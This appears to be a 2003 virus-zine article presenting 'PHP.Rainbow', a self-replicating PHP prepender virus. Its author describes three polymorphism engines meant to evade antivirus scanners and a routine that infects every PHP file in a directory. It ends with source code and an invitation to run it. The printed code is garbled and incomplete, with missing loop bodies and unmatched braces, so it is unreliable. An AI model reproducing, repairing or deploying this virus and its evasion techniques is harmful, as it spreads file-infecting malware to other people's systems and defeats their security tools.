Last article Table of contents Next article

PHP.Rainbow by Second Part To Hell
  written in october 2003
  in Austria

  You're looking at my very first PHP virus, but don't be sad, it's a really good one :)
  First I want to tell you something about the features of the virus, then I'll give
  you some information about the technique of the features.
  OK, it's a Prepender PHP virus, which uses three polymorphism techniques. The poly engines
  are totally new, because I've never seen any other poly PHP virus (Kefi did one in
  the meantime, but I haven't seen it so far). As I told you, there are three different
  polymorphism techniques, I'm sure that you want to know more about them :) First engine
  adds trash/garbage/junk (whatever you wanna call it) to the code, the second one changes
  15 variable/function names. And the last one changes numbers. Now let's have a look at
  the better explanation, not this shourt summary :)

  Techniqual Information:

    * Poly Engines

      --> Adding Trash/Junk/Garbage
		The Virus adds every second line a junk line to the code.
		This junk line could contain:
		- // anything
		- $anything='anything';
		- $anything=number;
		Because the code would be damn big after the 5th generation, I decided
		to delete the trash after every generation and to make a new one. Anyway,
		the chance to get a trash-line will be bigger, because there are more
		lines (more lines --> more chance). But I tested about 30 generation
		and it's no big problem with the size.

      --> Changing Variable/function names
		The Virus uses an array with all variable/function names of the virus,
		every generation it changes every array-entry (every name) to a 5-15
		sign long new name.

      --> Number changing
		The virus is able to change every number in the code. This is a real
		successfull way to fake AVs, i think! A number (for instands '10') could
		also be one of the following things:
		It's easy to understand, I think. I decided to change every 5th number I can
		find, because it looks better than changing every number every generation.

    * Infection Method

      --> Prepender
		This code is a prepender virus, which doesn't harm the victim file.
		It reads the first PHP part (which is the whole virus code) of the current
		file (__FILE__, as it's called in PHP). Then it searches for every PHP-file
		in the current directory, and adds the changed virus code at the top of
		the victim file. Before infecting the virus checks, if there's already an 
		infection mark of the virus, which is 'RainBow'.

  Something else little interesting is, that it's hard to get many different generations from
  the virus, because it just changes, if it infects a file. And just the infected file has the
  different form, not the old virus. That's a little trick, which I read in an article about
  polymorphism by SnakeByte. He wrote, that it will use more time to get many generations, which
  is a problem for AVs (who needs many generations :D).

	In the end I want to thank the following people, which made it possible, that I
	wrote this virus :)

	- Fugo		<-- Guy from school, PHP expert but non viral stuff :(
			    Much thanks for the information you gave me in PHP!

	- &	<-- Great PHP information!!!

	- MaskBits/VXI	<-- Writing the first real PHP maleware (released in 29A#5)

	- PhileT0Ast3r	<-- Telling me, that Kefi also writes a PHP poly virus

	- Kefi		<-- for also writing a PHP poly virus :D

	- Theatre Of Tragedy | Darkfall		<-- for the great sounds!!!

	- Cigarettes | Beer	<-- for helping me to don't commit suicide while searching
				    for the bugs in this little thing :)

  Maybe you wanna know, why I gave this name. I won't tell you, but the person, who the name
  comes from, should understand it ;)
  Execute this virus with PHP 4.3.3 + PEAR. I did it, and it worked really fine!

--------------------------------------< PHP.RainBow >--------------------------------------
<?php // RainBow
 $string=strtok(fread(fopen(__FILE__,'r'), filesize(__FILE__)),chr(13).chr(10));
 $newcont='<?php // RainBow'.chr(13).chr(10);
while ($string && $string!='?>'){
if(rand(0,1)){$newcont.='// '.trash('',0).chr(13).chr(10);}
if($string{0}!='/' && $string{0}!='$'){$newcont.=$string.chr(13).chr(10);}}
 $countj=-1; $number='';
if (ord($newcont{$countj})>47&&ord($newcont{$countj})<58){
if (!rand(0,5)){switch(rand(1,3)){case 1:$allcont.='('.($number-$remn).'+'.$remn.')';break;
case 2:$allcont.='('.($number+$remn).'-'.$remn.')';break;
case 3:$allcont.='('.($number*$remn).'/'.$remn.')';break;}}else{$allcont.=$number;}}
if (!strstr(fread($victim, 25),'RainBow')){rewind($victim);
function trash($returnvar, $countj){
return $returnvar;}

living virus